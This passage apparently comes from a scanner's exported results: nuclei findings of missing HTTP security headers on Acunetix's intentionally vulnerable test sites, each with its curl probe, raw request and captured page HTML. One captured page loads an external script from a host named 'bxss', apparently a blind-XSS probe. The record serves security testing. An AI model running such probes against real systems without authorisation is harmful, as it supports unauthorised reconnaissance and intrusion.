src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 369, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-embedder-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:40:56.586Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 370, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-permitted-cross-domain-policies", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:40:56.728Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 371, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:40:56.861Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 372, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "permissions-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:40:56.996Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD id="tdPageData" valign="top">\r\n\t\t\t\t\t<DIV class="NewsDate">posted by <strong>admin </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">(37) comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">(41) comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>\r\n\r\n\t\t\t\t\t<TD vAlign="top" width="200">\r\n\t\t\t\t\t\t<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">\r\n\t<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">\r\n\t\t<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9040')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">November 2024</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V9101')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>\r\n\t</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9066')" style="color:Black" title="October 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9067')" style="color:Black" title="October 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9068')" style="color:Black" title="October 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9069')" style="color:Black" title="October 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9070')" style="color:Black" title="October 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9071')" style="color:Black" title="November 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9072')" style="color:Black" title="November 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9073')" style="color:Black" title="November 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9074')" style="color:Black" title="November 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9075')" style="color:Black" title="November 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9076')" style="color:Black" title="November 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9077')" style="color:Black" title="November 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9078')" style="color:Black" title="November 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9079')" style="color:Black" title="November 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9080')" style="color:Black" title="November 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9081')" style="color:Black" title="November 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9082')" style="color:Black" title="November 12">12</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9083')" style="color:Black" title="November 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9084')" style="color:Black" title="November 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9085')" style="color:Black" title="November 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9086')" style="color:Black" title="November 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9087')" style="color:Black" title="November 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9088')" style="color:Black" title="November 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9089')" style="color:Black" title="November 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9090')" style="color:Black" title="November 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9091')" style="color:Black" title="November 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9092')" style="color:Black" title="November 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9093')" style="color:Black" title="November 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9094')" style="color:Black" title="November 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9095')" style="color:Black" title="November 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9096')" style="color:Black" title="November 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9097')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9098')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9099')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9100')" style="color:Black" title="November 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9101')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9102')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9103')" style="color:Black" title="December 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9104')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9105')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9106')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','9107')" style="color:Black" title="December 07">7</a></td></tr>\r\n</table><BR>\r\n<a href="rssFeed.aspx">Get RSS feed</a>\r\n</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t\t<TR>\r\n\t\t\t\t\t<TD colSpan="2">\r\n\t\t\t\t\t</TD>\r\n\t\t\t\t</TR>\r\n\t\t\t</TABLE>\r\n\t\t</form>\r\n\t</body>\r\n\t<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">\r\n\t\t<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>\r\n\t</div>\r\n</HTML>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 373, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "content-security-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:40:57.148Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 